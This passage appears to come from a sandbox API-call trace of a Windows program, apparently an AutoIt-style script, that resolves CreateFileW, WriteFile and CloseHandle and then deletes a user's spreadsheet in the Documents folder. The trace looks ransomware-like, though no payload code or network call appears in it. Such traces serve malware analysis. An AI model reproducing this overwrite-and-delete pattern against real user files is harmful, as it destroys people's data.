(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.862] CharLowerBuffW (in: lpsz="byte[67272]", cchLength=0xb | out: lpsz="byte[67272]") returned 0xb [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.863] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.863] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.863] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da348 [0032.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da348, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0032.863] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.864] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.864] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.865] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.866] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.866] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0032.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x88c988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0032.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7hwynz2k.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.866] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.866] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.867] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.867] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.867] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0032.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cbb0 [0032.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cbb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0032.868] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.868] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.868] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.868] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.868] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.868] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.868] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.868] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0032.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.869] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.869] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpFilePart=0x0) returned 0x35 [0032.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x1379afc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 0x7c2100 [0032.869] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7hwynz2k.xlsx")) returned 1 [0032.871] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x1379afc0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 0 [0032.871] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 